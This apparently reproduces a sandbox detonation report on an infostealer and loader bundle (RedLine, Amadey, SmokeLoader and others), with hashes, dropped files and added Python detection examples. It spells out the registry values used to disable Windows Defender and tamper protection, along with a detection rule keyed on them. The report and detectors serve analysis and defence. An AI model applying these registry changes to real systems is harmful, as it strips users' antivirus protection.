memory/1920-974-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1992-978-0x0000000000020000-0x000000000003E000-memory.dmp

memory/1992-979-0x0000000000400000-0x0000000000431000-memory.dmp

memory/1992-985-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2100-988-0x0000000005260000-0x00000000052A0000-memory.dmp

memory/1256-987-0x00000000002D0000-0x00000000002EE000-memory.dmp

memory/2100-989-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2100-991-0x00000000004A0000-0x00000000004A1000-memory.dmp

memory/1256-992-0x0000000004A10000-0x0000000004A50000-memory.dmp

memory/1256-990-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2212-993-0x0000000004370000-0x0000000004C5B000-memory.dmp

memory/2212-994-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1920-997-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2212-995-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1204-996-0x0000000003B20000-0x0000000003B36000-memory.dmp

memory/888-1001-0x0000000004080000-0x0000000004478000-memory.dmp

memory/888-1002-0x0000000004080000-0x0000000004478000-memory.dmp

memory/1992-1003-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/888-1011-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1932-1054-0x000000013FCA0000-0x0000000140241000-memory.dmp

memory/2100-1055-0x0000000005260000-0x00000000052A0000-memory.dmp

memory/888-1052-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1256-1056-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/1876-1057-0x0000000003E90000-0x0000000004288000-memory.dmp

memory/1256-1063-0x0000000004A10000-0x0000000004A50000-memory.dmp

memory/1876-1062-0x0000000003E90000-0x0000000004288000-memory.dmp

memory/1876-1064-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1876-1070-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1876-1071-0x0000000003E90000-0x0000000004288000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/1932-1091-0x000000013FCA0000-0x0000000140241000-memory.dmp

memory/2676-1099-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

memory/2676-1100-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/2100-1101-0x00000000004C0000-0x00000000004DC000-memory.dmp

memory/2676-1102-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/1876-1104-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2676-1107-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/2676-1126-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/2676-1127-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/2676-1128-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/2100-1129-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1130-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1150-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2676-1151-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

memory/2100-1153-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1155-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1157-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1161-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1159-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1163-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1165-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1172-0x0000000000500000-0x0000000000501000-memory.dmp

memory/2100-1171-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/1820-1195-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1194-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1196-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 11ab007cfbcacdc1c6d896e82bdfc4e9
SHA1 1ce1adb0df42f0b5db780e3024d6af4a543ff6df
SHA256 2ab5a85800926416dae456d85034f14f0f900ea57dad402b03dfaf5459456879
SHA512 2a0ba9f65c3c2a8724e7bafac754c4a0163c04bc3bd93837e092d4601a6d65a30b873410dfe09a53ca117cdec9b90fa3f6b594f6877ecb8102aab8e752df1642

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 04207c62088dc57591a21020c1fe9d0e
SHA1 b4035f465dd4ffe5a663ad1f15fb3d94d3ea4771
SHA256 d8c1d2ce9b5e251f5d82037668faeed5f4c4b097a70f0adde47bd05aadb1d399
SHA512 926b15c4488105a7259c4b29dbe686cc432d180172677c12062208a65ca6047f635209fd017583c14538e04306cd3df5eab6ce78fcf48e32ca62ce27d30dde85

memory/1820-1193-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1192-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1182-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2100-1169-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1167-0x00000000004C0000-0x00000000004D5000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 84b7b15f002b026f01764e4f79afb40a
SHA1 b7f02db7505eafaa9920a0ccee963751ff92061b
SHA256 94f90489e4b14e597e86ddafd8b154d5a3262ba93fff0ae50ab92acf3d46523d
SHA512 d202542d403ba038e520858d9014afcc0e8afd327e893624182ae191b579d87543e960083dee2522bb336e981abf86e2598602500f9460506da62d9b7d5fb388

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EVZ2FBHDFHJB4ZVEW430.temp

MD5 093bbb10d2357b79fca208f77c59c47d
SHA1 ba419cd0b96b7e1396653c16378071de9f2ea7d2
SHA256 d57302323fa9d001bf5688e22e45ab4f8af6ac85864c20c2cb05355f885c1bad
SHA512 bc3a50a76b2385859a8816f24e36936f5ca3b852c0dc152923f490191b47e3510b296b03a840289f9b1de30ec02e09560c79edc6310eb3564ccbfe70022353eb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 4df8c6ff3e7a04da12ad75fdf36bf309
SHA1 c93ae5e9f1519b2526c0dbfb861bde4bde08b10e
SHA256 b768fa1eb08331ad21ee462e133f7f0125b29808c0e82e9c64508dab60b35c8a
SHA512 be3971fe051642a1e086a1247c0eaec0af51a96d5255f1c5538c56ad957755fc58a19a97638cf34c49c34176af9c97c177d96fc6f0be441bf0c09e56f1722bac

memory/584-1307-0x0000000001F90000-0x0000000001F98000-memory.dmp

memory/584-1295-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e7b4217fe77d362bb1522a55085f405
SHA1 72e3d4662ce53dca64c787a5d8e446eb0143a6a7
SHA256 1269b8a4d49358b6a40c77dd93a25c0701128da9a04750aecf535d0d774c370e
SHA512 b296c7aeb0e049fb2fdcb6cf72be6aa7eab416a0bd0b343f252d9db0ba4143be86d2672328194d3c0cceea41cd0e9c8bb44c03713fb13bd2f297e79c960f4ae6

memory/584-1317-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

memory/584-1349-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/584-1404-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

memory/584-1405-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/584-1417-0x0000000002360000-0x00000000023E0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c219501c2f8db8db8980bda6eb471d71
SHA1 60cf2337b001c1c25943e6e1baab6213582276a7
SHA256 4335d3b0825ac0e753b27b5a871ece8b7ebcb4c307cf7aa9d076668fc68773e8
SHA512 f9237285ce0f62cb5af1bcee022c7029bf7ffe2798c522a941554e1bc0302076b01f39a71727850c88b199f9b9a9709bb38657c98896f9e2ccb8643ac7ca4a5b

C:\Users\Admin\AppData\Local\Temp\tmpA13F.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpA1B2.tmp

MD5 213238ebd4269260f49418ca8be3cd01
SHA1 f4516fb0d8b526dc11d68485d461ab9db6d65595
SHA256 3f8b0d150b1f09e01d194e83670a136959bed64a080f71849d2300c0bfa92e53
SHA512 5e639f00f3be46c439a8aaf80481420dbff46e5c85d103192be84763888fb7fcb6440b75149bf1114f85d4587100b9de5a37c222c21e5720bc03b708aa54c326

memory/584-1501-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

memory/2432-1542-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DV38LGVA\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2432-1565-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1256-1578-0x0000000070700000-0x0000000070DEE000-memory.dmp
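
Sandbox file lists of this kind record the same file several times, list it under both the drive-less "\Users\..." and the "C:\Users\..." path forms, and mix payloads with CryptoAPI and browser cache churn. The script below is an added example, not code from the sandbox or this report: it parses the record layout used on this page (a path line followed by MD5/SHA1/SHA256/SHA512 lines, with memory/<pid>-... dump entries carrying no hashes), checks digest lengths, folds the path variants, keys on SHA256 so repeated writes collapse into one indicator, and drops the cache directories. The noise-directory list is this example's own heuristic and the sample input is constructed from four entries on this page with the hash lines abridged.

```python
"""Collapse dropped-file records in this report's layout into a deduplicated IoC set.

Added example; not code from the sandbox or the report. Record layout assumed:
a path line, then MD5/SHA1/SHA256/SHA512 lines; memory/<pid>-... entries have
no hashes. The noise/payload split by directory is this example's heuristic.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_HASH_LINE = re.compile(r"(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)")

# Directories whose contents are CryptoAPI/browser cache churn (CRL fetches,
# favicons, jump lists), not payloads. Matched case-insensitively.
NOISE_DIRS = (
    "\\cryptneturlcache\\",
    "\\temporary internet files\\",
    "\\internet explorer\\imagestore\\",
    "\\windows\\recent\\",
)

@dataclass
class DroppedFile:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)

@dataclass
class Ioc:
    sha256: str
    md5: str
    paths: Set[str] = field(default_factory=set)

def normalize_path(p: str) -> str:
    """Fold the report's drive-less '\\Users\\...' form onto 'C:\\Users\\...'."""
    return "C:" + p if p.startswith("\\") else p

def parse_dropped_files(text: str) -> List[DroppedFile]:
    records: List[DroppedFile] = []
    current: Optional[DroppedFile] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _HASH_LINE.fullmatch(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest of wrong length: {line!r}")
            if current is not None:
                current.hashes[algo] = digest
            continue
        if line.startswith("memory/"):
            current = None  # memory dump entry; no hash lines follow it
            continue
        current = DroppedFile(normalize_path(line))
        records.append(current)
    return records

def is_noise(path: str) -> bool:
    low = path.lower()
    return any(d in low for d in NOISE_DIRS)

def build_ioc_set(records: List[DroppedFile]) -> Dict[str, Ioc]:
    """Key on SHA256 so repeated writes of one file collapse; keep every path seen."""
    iocs: Dict[str, Ioc] = {}
    for r in records:
        sha = r.hashes.get("SHA256")
        if sha is None or is_noise(r.path):
            continue
        iocs.setdefault(sha, Ioc(sha, r.hashes.get("MD5", ""))).paths.add(r.path)
    return iocs

# Constructed input: four records copied from this page, hash lines abridged.
SAMPLE_REPORT = r"""
memory/1160-917-0x0000000070700000-0x0000000070DEE000-memory.dmp

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cc298731723bb1666ddd4c9eab777c12
SHA256 c37c5f8b5a050027f66e0bc183c04a79045f1574b1ea64ce953f87b980c720e4

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
"""

if __name__ == "__main__":
    for sha, ioc in build_ioc_set(parse_dropped_files(SAMPLE_REPORT)).items():
        print(sha, ioc.md5, sorted(ioc.paths))
```

On the sample the two toolspub2.exe records fold into one indicator with a single normalized path, the CryptnetUrlCache entry is dropped, and updater.exe survives as the second indicator. Keep the SHA512 values as well if the feed you push to supports them; MD5 is carried only because most blocklists still key on it.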

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 21:01

Reported

2023-10-10 21:50

Platform

win10v2004-20230915-en

Max time kernel

168s

Max time network

188s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detects Healer, an antivirus-disabler dropper

3 matches; indicator details are not recorded in the report.

Glupteba

loader dropper glupteba

Glupteba payload

4 matches; indicator details are not recorded in the report.

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A

RedLine

infostealer redline

RedLine payload

8 matches; indicator details are not recorded in the report.

SectopRAT

trojan rat sectoprat

SectopRAT payload

3 matches; indicator details are not recorded in the report.

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
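
The "Drops file in Drivers directory" signature fires on the path prefix: the file latestX.exe created is C:\Windows\System32\drivers\etc\hosts, the static name-resolution table, not a driver. The report does not show what was written to it, so the function below, an added example and not the sandbox's code, triages a hosts file generically: it parses the file, ignores the stock localhost mappings, and flags any name sinkholed to a local address (the pattern used to cut off update and telemetry traffic) or redirected to another host. SAMPLE_HOSTS is constructed for the example and its hostnames are reserved .example names, not domains from this sample.

```python
r"""Triage a Windows hosts file such as the one latestX.exe created above.

Added example, not sandbox code. The report records only that
C:\Windows\System32\drivers\etc\hosts was created; SAMPLE_HOSTS below is
constructed, and its hostnames are reserved .example names.
"""
import ipaddress
from typing import List, Tuple

# The only mappings a stock Windows hosts file carries (commented out by default).
DEFAULT_ENTRIES = {("127.0.0.1", "localhost"), ("::1", "localhost")}
LOCAL_SINKS = {"0.0.0.0", "127.0.0.1", "::1"}

Entry = Tuple[int, str, str]            # (line number, address, hostname)
Finding = Tuple[int, str, str, str]     # (line number, address, hostname, reason)

def parse_hosts(text: str) -> List[Entry]:
    """One entry per hostname; '#' comments and blank lines are skipped."""
    entries: List[Entry] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        if not body:
            continue
        addr, *names = body.split()
        for name in names:
            entries.append((lineno, addr, name.lower().rstrip(".")))
    return entries

def suspicious_entries(text: str) -> List[Finding]:
    """Everything that is not a stock localhost mapping, with a reason."""
    findings: List[Finding] = []
    for lineno, addr, name in parse_hosts(text):
        if (addr, name) in DEFAULT_ENTRIES:
            continue
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            findings.append((lineno, addr, name, "malformed address"))
            continue
        if addr in LOCAL_SINKS:
            findings.append((lineno, addr, name,
                             "sinkholed to a local address (update/telemetry blocking pattern)"))
        else:
            findings.append((lineno, addr, name,
                             "redirected to a non-local address (phishing/MitM pattern)"))
    return findings

# Constructed sample: stock header, then three lines an installer would never add.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
127.0.0.1 localhost
0.0.0.0 update.av-vendor.example
0.0.0.0 telemetry.av-vendor.example   # appended by the dropper (constructed)
198.51.100.7 login.bank.example
"""

if __name__ == "__main__":
    for lineno, addr, name, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {lineno}: {addr} {name}: {reason}")
```

On a live host, read the file with an elevated prompt and compare against the same check; any non-localhost entry on a machine that is not deliberately using hosts overrides is worth a ticket, and a run of security-vendor or update domains pointed at 0.0.0.0 is the specific signal this family's hosts write is known for.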

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\776F.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8F40.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\CFF3.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\776F.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CFF3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4257.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\444C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bbtrhjj N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F0A.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
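
The two signatures above (the five Real-Time Protection policy values set to 1, and TamperProtection set to 0, all by 8675.exe) are what a registry-write detection should key on. The Python below is an added example, not part of this report: it runs over constructed, simplified Sysmon Event ID 13 (RegistryEvent, SetValue) records, using Sysmon's field names in a one-line key="value" layout assumed for the example, and alerts only when the data actually weakens Defender, so an administrator setting a toggle back to 0 does not fire.

```python
"""Detect the Defender-weakening registry writes recorded in the two tables above.

Added example, not part of the sandbox report. Events are constructed in a
simplified Sysmon Event ID 13 (RegistryEvent, SetValue) style with
key="value" fields; the field names follow Sysmon, the one-line layout is
this example's assumption.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Policy values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
# that switch a real-time component off when set to 1 (all five appear in the report).
RTP_POLICY_KEY = r"\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
RTP_DISABLE_VALUES = {
    "DisableBehaviorMonitoring",
    "DisableIOAVProtection",
    "DisableOnAccessProtection",
    "DisableRealtimeMonitoring",
    "DisableScanOnRealtimeEnable",
}
# Tamper protection lives under the non-policy Features key; 0 turns it off.
TAMPER_VALUE = r"\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection"

@dataclass(frozen=True)
class Alert:
    image: str
    target: str
    value_name: str
    reason: str

_FIELD = re.compile(r'(\w+)="([^"]*)"')
_HIVE = re.compile(r"^(HKLM|HKEY_LOCAL_MACHINE|\\REGISTRY\\MACHINE)", re.I)

def parse_event(line: str) -> Dict[str, str]:
    return dict(_FIELD.findall(line))

def dword(details: str) -> Optional[int]:
    """Sysmon renders REG_DWORD data as 'DWORD (0x00000001)'."""
    m = re.fullmatch(r"DWORD \((0x[0-9a-fA-F]+)\)", details.strip())
    return int(m.group(1), 16) if m else None

def classify(ev: Dict[str, str]) -> Optional[Alert]:
    if ev.get("EventType") != "SetValue":
        return None
    data = dword(ev.get("Details", ""))
    if data is None:
        return None                      # string/binary data: not a policy toggle
    target = ev.get("TargetObject", "")
    path = _HIVE.sub("", target)         # HKLM\..., HKEY_LOCAL_MACHINE\... and \REGISTRY\MACHINE\... all fold
    key, _, value_name = path.rpartition("\\")
    image = ev.get("Image", "?")
    if key.lower() == RTP_POLICY_KEY.lower() and value_name in RTP_DISABLE_VALUES and data == 1:
        return Alert(image, target, value_name, "real-time protection component disabled via policy key")
    if path.lower() == TAMPER_VALUE.lower() and data == 0:
        return Alert(image, target, value_name, "tamper protection turned off")
    return None

def scan(lines: Iterable[str]) -> List[Alert]:
    return [a for a in (classify(parse_event(l)) for l in lines) if a is not None]

SAMPLE_EVENTS = [
    # two of the five policy writes and the TamperProtection write from the report, by 8675.exe
    'EventType="SetValue" Image="C:\\Users\\Admin\\AppData\\Local\\Temp\\8675.exe" '
    'TargetObject="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring" '
    'Details="DWORD (0x00000001)"',
    'EventType="SetValue" Image="C:\\Users\\Admin\\AppData\\Local\\Temp\\8675.exe" '
    'TargetObject="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring" '
    'Details="DWORD (0x00000001)"',
    'EventType="SetValue" Image="C:\\Users\\Admin\\AppData\\Local\\Temp\\8675.exe" '
    'TargetObject="\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection" '
    'Details="DWORD (0x00000000)"',
    # constructed negatives: an admin setting a toggle back to 0, and an unrelated DWORD write
    'EventType="SetValue" Image="C:\\Windows\\regedit.exe" '
    'TargetObject="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring" '
    'Details="DWORD (0x00000000)"',
    'EventType="SetValue" Image="C:\\Windows\\explorer.exe" '
    'TargetObject="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden" '
    'Details="DWORD (0x00000001)"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.image}: {a.value_name}: {a.reason}")
```

Whether these writes take effect depends on the tamper-protection state at the time, so alert on the write itself rather than on its effect; a process running from %TEMP% writing HKLM policy keys is high-confidence on its own, and the TamperProtection write from the same process is the higher-fidelity of the two events.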

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\62CC.exe N/A
